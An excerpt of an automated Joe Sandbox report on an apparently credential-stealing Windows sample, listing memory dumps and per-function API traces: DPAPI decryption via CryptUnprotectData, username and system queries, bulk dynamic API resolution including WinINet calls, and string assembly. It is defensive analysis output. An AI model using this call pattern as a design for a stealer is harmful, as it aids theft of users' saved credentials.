Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 04b651bda692fee1dd872fdfed394c7d46f349886dcdd88bc93a880669b357bd
Instruction ID: bbf27f3a3e070804a67f96b8f8255eb22f867e9a13d4e51a6c7a3c3a75d0f28a
Opcode Fuzzy Hash: 04b651bda692fee1dd872fdfed394c7d46f349886dcdd88bc93a880669b357bd
Instruction Fuzzy Hash: 2F11A5B1946228EBEB14DF54DC45FAAB778F705711F1043A6EA06932C0C7745E40CF51

Function 00699B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00699B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00699BA3
LocalFree.KERNEL32(?), ref: 00699BD3

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: d4de19f14f48e67789f0a3584650039138fb1fe3713bee6b44711319ed819317
Instruction ID: 63edfaf1146b2ae8091324d453d170fe263239883eb6ea06ef5630d0d8ee839d
Opcode Fuzzy Hash: d4de19f14f48e67789f0a3584650039138fb1fe3713bee6b44711319ed819317
Instruction Fuzzy Hash: C411B7B8A01209EFDB04DF98D985AAEB7B9FF89300F104599E915A7350D774AE10CFA1

Function 006A7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
RtlAllocateHeap.NTDLL(00000000), ref: 006A7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 574eb58f73ca0e942a920a109cf9a1391c107475e5642d7c7b0e28c542da69f9
Instruction ID: 70615cbb819b5257068453752ff466819592e5bb714788ae7a61141832d6e8c0
Opcode Fuzzy Hash: 574eb58f73ca0e942a920a109cf9a1391c107475e5642d7c7b0e28c542da69f9
Instruction Fuzzy Hash: FBF04FB1944208ABC704DF98DD49BAEBBB8FB05711F10026AFA05A2680C77919048BA1

Function 00691160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0069116A
ExitProcess.KERNEL32 ref: 0069117E

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 623f1393379af15adc309e0f4262399c80baccfa342e10ff6e9eb13e9ce3dcb4
Instruction ID: 075010d735f2cdeabc50c3e38a19e7de821d49dafbac9e6a2e8e22ed74e1ffc6
Opcode Fuzzy Hash: 623f1393379af15adc309e0f4262399c80baccfa342e10ff6e9eb13e9ce3dcb4
Instruction Fuzzy Hash: 2CD05E7490130CDBCB04DFE0D8496DDBB78FB08312F200695D90562340EA305481CAA6

Function 006A9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01345930), ref: 006A9C2D
GetProcAddress.KERNEL32(74DD0000,01345950), ref: 006A9C45
GetProcAddress.KERNEL32(74DD0000,01359688), ref: 006A9C5E
GetProcAddress.KERNEL32(74DD0000,013596A0), ref: 006A9C76
GetProcAddress.KERNEL32(74DD0000,01359628), ref: 006A9C8E
GetProcAddress.KERNEL32(74DD0000,013596D0), ref: 006A9CA7
GetProcAddress.KERNEL32(74DD0000,0134B770), ref: 006A9CBF
GetProcAddress.KERNEL32(74DD0000,0135D458), ref: 006A9CD7
GetProcAddress.KERNEL32(74DD0000,0135D410), ref: 006A9CF0
GetProcAddress.KERNEL32(74DD0000,0135D488), ref: 006A9D08
GetProcAddress.KERNEL32(74DD0000,0135D4D0), ref: 006A9D20
GetProcAddress.KERNEL32(74DD0000,013456F0), ref: 006A9D39
GetProcAddress.KERNEL32(74DD0000,013456B0), ref: 006A9D51
GetProcAddress.KERNEL32(74DD0000,01345A10), ref: 006A9D69
GetProcAddress.KERNEL32(74DD0000,013459F0), ref: 006A9D82
GetProcAddress.KERNEL32(74DD0000,0135D4A0), ref: 006A9D9A
GetProcAddress.KERNEL32(74DD0000,0135D428), ref: 006A9DB2
GetProcAddress.KERNEL32(74DD0000,0134BA18), ref: 006A9DCB
GetProcAddress.KERNEL32(74DD0000,013457F0), ref: 006A9DE3
GetProcAddress.KERNEL32(74DD0000,0135D560), ref: 006A9DFB
GetProcAddress.KERNEL32(74DD0000,0135D4B8), ref: 006A9E14
GetProcAddress.KERNEL32(74DD0000,0135D440), ref: 006A9E2C
GetProcAddress.KERNEL32(74DD0000,0135D500), ref: 006A9E44
GetProcAddress.KERNEL32(74DD0000,01345A50), ref: 006A9E5D
GetProcAddress.KERNEL32(74DD0000,0135D3F8), ref: 006A9E75
GetProcAddress.KERNEL32(74DD0000,0135D578), ref: 006A9E8D
GetProcAddress.KERNEL32(74DD0000,0135D590), ref: 006A9EA6
GetProcAddress.KERNEL32(74DD0000,0135D4E8), ref: 006A9EBE
GetProcAddress.KERNEL32(74DD0000,0135D518), ref: 006A9ED6
GetProcAddress.KERNEL32(74DD0000,0135D530), ref: 006A9EEF
GetProcAddress.KERNEL32(74DD0000,0135D470), ref: 006A9F07
GetProcAddress.KERNEL32(74DD0000,0135D5A8), ref: 006A9F1F
GetProcAddress.KERNEL32(74DD0000,0135D548), ref: 006A9F38
GetProcAddress.KERNEL32(74DD0000,0135A2D0), ref: 006A9F50
GetProcAddress.KERNEL32(74DD0000,0135CED0), ref: 006A9F68
GetProcAddress.KERNEL32(74DD0000,0135CEE8), ref: 006A9F81
GetProcAddress.KERNEL32(74DD0000,01345750), ref: 006A9F99
GetProcAddress.KERNEL32(74DD0000,0135CF60), ref: 006A9FB1
GetProcAddress.KERNEL32(74DD0000,01345A70), ref: 006A9FCA
GetProcAddress.KERNEL32(74DD0000,0135CF00), ref: 006A9FE2
GetProcAddress.KERNEL32(74DD0000,0135CFC0), ref: 006A9FFA
GetProcAddress.KERNEL32(74DD0000,01345790), ref: 006AA013
GetProcAddress.KERNEL32(74DD0000,01345BD0), ref: 006AA02B
LoadLibraryA.KERNEL32(0135CE28,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA03D
LoadLibraryA.KERNEL32(0135CE88,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA04E
LoadLibraryA.KERNEL32(0135CF30,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA060
LoadLibraryA.KERNEL32(0135CF18,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA072
LoadLibraryA.KERNEL32(0135CF48,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA083
LoadLibraryA.KERNEL32(0135CF78,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA095
LoadLibraryA.KERNEL32(0135D080,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA0A7
LoadLibraryA.KERNEL32(0135CE40,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA0B8
GetProcAddress.KERNEL32(75290000,01345B70), ref: 006AA0DA
GetProcAddress.KERNEL32(75290000,0135D098), ref: 006AA0F2
GetProcAddress.KERNEL32(75290000,01359178), ref: 006AA10A
GetProcAddress.KERNEL32(75290000,0135D0B0), ref: 006AA123
GetProcAddress.KERNEL32(75290000,01345BF0), ref: 006AA13B
GetProcAddress.KERNEL32(734C0000,0134B7C0), ref: 006AA160
GetProcAddress.KERNEL32(734C0000,01345D90), ref: 006AA179
GetProcAddress.KERNEL32(734C0000,0134B7E8), ref: 006AA191
GetProcAddress.KERNEL32(734C0000,0135CFA8), ref: 006AA1A9
GetProcAddress.KERNEL32(734C0000,0135CEA0), ref: 006AA1C2
GetProcAddress.KERNEL32(734C0000,01345AD0), ref: 006AA1DA
GetProcAddress.KERNEL32(734C0000,01345B50), ref: 006AA1F2
GetProcAddress.KERNEL32(734C0000,0135D038), ref: 006AA20B
GetProcAddress.KERNEL32(752C0000,01345AB0), ref: 006AA22C
GetProcAddress.KERNEL32(752C0000,01345E30), ref: 006AA244
GetProcAddress.KERNEL32(752C0000,0135D0E0), ref: 006AA25D
GetProcAddress.KERNEL32(752C0000,0135CF90), ref: 006AA275
GetProcAddress.KERNEL32(752C0000,01345B90), ref: 006AA28D
GetProcAddress.KERNEL32(74EC0000,0134B5E0), ref: 006AA2B3
GetProcAddress.KERNEL32(74EC0000,0134B810), ref: 006AA2CB
GetProcAddress.KERNEL32(74EC0000,0135CE58), ref: 006AA2E3
GetProcAddress.KERNEL32(74EC0000,01345B30), ref: 006AA2FC
GetProcAddress.KERNEL32(74EC0000,01345CF0), ref: 006AA314
GetProcAddress.KERNEL32(74EC0000,0134B888), ref: 006AA32C
GetProcAddress.KERNEL32(75BD0000,0135CDF8), ref: 006AA352
GetProcAddress.KERNEL32(75BD0000,01345E50), ref: 006AA36A
GetProcAddress.KERNEL32(75BD0000,01359188), ref: 006AA382
GetProcAddress.KERNEL32(75BD0000,0135D050), ref: 006AA39B
GetProcAddress.KERNEL32(75BD0000,0135D020), ref: 006AA3B3
GetProcAddress.KERNEL32(75BD0000,01345DB0), ref: 006AA3CB
GetProcAddress.KERNEL32(75BD0000,01345C10), ref: 006AA3E4
GetProcAddress.KERNEL32(75BD0000,0135CFD8), ref: 006AA3FC
GetProcAddress.KERNEL32(75BD0000,0135CFF0), ref: 006AA414
GetProcAddress.KERNEL32(75A70000,01345C30), ref: 006AA436
GetProcAddress.KERNEL32(75A70000,0135D008), ref: 006AA44E
GetProcAddress.KERNEL32(75A70000,0135CEB8), ref: 006AA466
GetProcAddress.KERNEL32(75A70000,0135D0C8), ref: 006AA47F
GetProcAddress.KERNEL32(75A70000,0135CE10), ref: 006AA497
GetProcAddress.KERNEL32(75450000,01345C50), ref: 006AA4B8
GetProcAddress.KERNEL32(75450000,01345CD0), ref: 006AA4D1
GetProcAddress.KERNEL32(75DA0000,01345D70), ref: 006AA4F2
GetProcAddress.KERNEL32(75DA0000,0135CE70), ref: 006AA50A
GetProcAddress.KERNEL32(6F070000,01345D10), ref: 006AA530
GetProcAddress.KERNEL32(6F070000,01345AF0), ref: 006AA548
GetProcAddress.KERNEL32(6F070000,01345BB0), ref: 006AA560
GetProcAddress.KERNEL32(6F070000,0135D068), ref: 006AA579
GetProcAddress.KERNEL32(6F070000,01345DD0), ref: 006AA591
GetProcAddress.KERNEL32(6F070000,01345E10), ref: 006AA5A9
GetProcAddress.KERNEL32(6F070000,01345D30), ref: 006AA5C2
GetProcAddress.KERNEL32(6F070000,01345D50), ref: 006AA5DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 006AA5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 006AA607
GetProcAddress.KERNEL32(75AF0000,0135D3C8), ref: 006AA629
GetProcAddress.KERNEL32(75AF0000,013591A8), ref: 006AA641
GetProcAddress.KERNEL32(75AF0000,0135D0F8), ref: 006AA659
GetProcAddress.KERNEL32(75AF0000,0135D128), ref: 006AA672
GetProcAddress.KERNEL32(75D90000,01345C70), ref: 006AA693
GetProcAddress.KERNEL32(6CFD0000,0135D350), ref: 006AA6B4
GetProcAddress.KERNEL32(6CFD0000,01345B10), ref: 006AA6CD
GetProcAddress.KERNEL32(6CFD0000,0135D230), ref: 006AA6E5
GetProcAddress.KERNEL32(6CFD0000,0135D3E0), ref: 006AA6FD

Strings

InternetSetOptionA, xrefs: 006AA5E5
HttpQueryInfoA, xrefs: 006AA5FC

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 78c09b81222a163bebe2a74e5d3a6b22fc5e75adbe442935a160a9d158c77b44
Instruction ID: e62769a4b801fdf147d7b7870c898247c056fdd9269ca833f2a4afc0d3ff64f2
Opcode Fuzzy Hash: 78c09b81222a163bebe2a74e5d3a6b22fc5e75adbe442935a160a9d158c77b44
Instruction Fuzzy Hash: 7F624AB5602241AFC74CDFA9FD889663BF9F74C301734872BAA49C3264D7399941DB22

Function 00697710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00697724
RtlAllocateHeap.NTDLL(00000000), ref: 0069772B
lstrcat.KERNEL32(?,01359C80), ref: 006978DB
lstrcat.KERNEL32(?,?), ref: 006978EF
lstrcat.KERNEL32(?,?), ref: 00697903
lstrcat.KERNEL32(?,?), ref: 00697917
lstrcat.KERNEL32(?,0135E3B0), ref: 0069792B
lstrcat.KERNEL32(?,0135E308), ref: 0069793F
lstrcat.KERNEL32(?,0135E3C8), ref: 00697952
lstrcat.KERNEL32(?,0135E2A8), ref: 00697966
lstrcat.KERNEL32(?,01359D08), ref: 0069797A
lstrcat.KERNEL32(?,?), ref: 0069798E
lstrcat.KERNEL32(?,?), ref: 006979A2
lstrcat.KERNEL32(?,?), ref: 006979B6
lstrcat.KERNEL32(?,0135E3B0), ref: 006979C9
lstrcat.KERNEL32(?,0135E308), ref: 006979DD
lstrcat.KERNEL32(?,0135E3C8), ref: 006979F1
lstrcat.KERNEL32(?,0135E2A8), ref: 00697A04
lstrcat.KERNEL32(?,01359D70), ref: 00697A18
lstrcat.KERNEL32(?,?), ref: 00697A2C
lstrcat.KERNEL32(?,?), ref: 00697A40
lstrcat.KERNEL32(?,?), ref: 00697A54
lstrcat.KERNEL32(?,0135E3B0), ref: 00697A68
lstrcat.KERNEL32(?,0135E308), ref: 00697A7B
lstrcat.KERNEL32(?,0135E3C8), ref: 00697A8F
lstrcat.KERNEL32(?,0135E2A8), ref: 00697AA3
lstrcat.KERNEL32(?,01359DD8), ref: 00697AB6
lstrcat.KERNEL32(?,?), ref: 00697ACA
lstrcat.KERNEL32(?,?), ref: 00697ADE
lstrcat.KERNEL32(?,?), ref: 00697AF2
lstrcat.KERNEL32(?,0135E3B0), ref: 00697B06
lstrcat.KERNEL32(?,0135E308), ref: 00697B1A
lstrcat.KERNEL32(?,0135E3C8), ref: 00697B2D
lstrcat.KERNEL32(?,0135E2A8), ref: 00697B41
lstrcat.KERNEL32(?,0135E648), ref: 00697B55
lstrcat.KERNEL32(?,?), ref: 00697B69
lstrcat.KERNEL32(?,?), ref: 00697B7D
lstrcat.KERNEL32(?,?), ref: 00697B91
lstrcat.KERNEL32(?,0135E3B0), ref: 00697BA4
lstrcat.KERNEL32(?,0135E308), ref: 00697BB8
lstrcat.KERNEL32(?,0135E3C8), ref: 00697BCC
lstrcat.KERNEL32(?,0135E2A8), ref: 00697BDF
lstrcat.KERNEL32(?,0135E6B0), ref: 00697BF3
lstrcat.KERNEL32(?,?), ref: 00697C07
lstrcat.KERNEL32(?,?), ref: 00697C1B
lstrcat.KERNEL32(?,?), ref: 00697C2F
lstrcat.KERNEL32(?,0135E3B0), ref: 00697C43
lstrcat.KERNEL32(?,0135E308), ref: 00697C56
lstrcat.KERNEL32(?,0135E3C8), ref: 00697C6A
lstrcat.KERNEL32(?,0135E2A8), ref: 00697C7E

Part of subcall function 006975D0: lstrcat.KERNEL32(2F74D020,006B17FC), ref: 00697606
Part of subcall function 006975D0: lstrcat.KERNEL32(2F74D020,00000000), ref: 00697648
Part of subcall function 006975D0: lstrcat.KERNEL32(2F74D020, : ), ref: 0069765A
Part of subcall function 006975D0: lstrcat.KERNEL32(2F74D020,00000000), ref: 0069768F
Part of subcall function 006975D0: lstrcat.KERNEL32(2F74D020,006B1804), ref: 006976A0
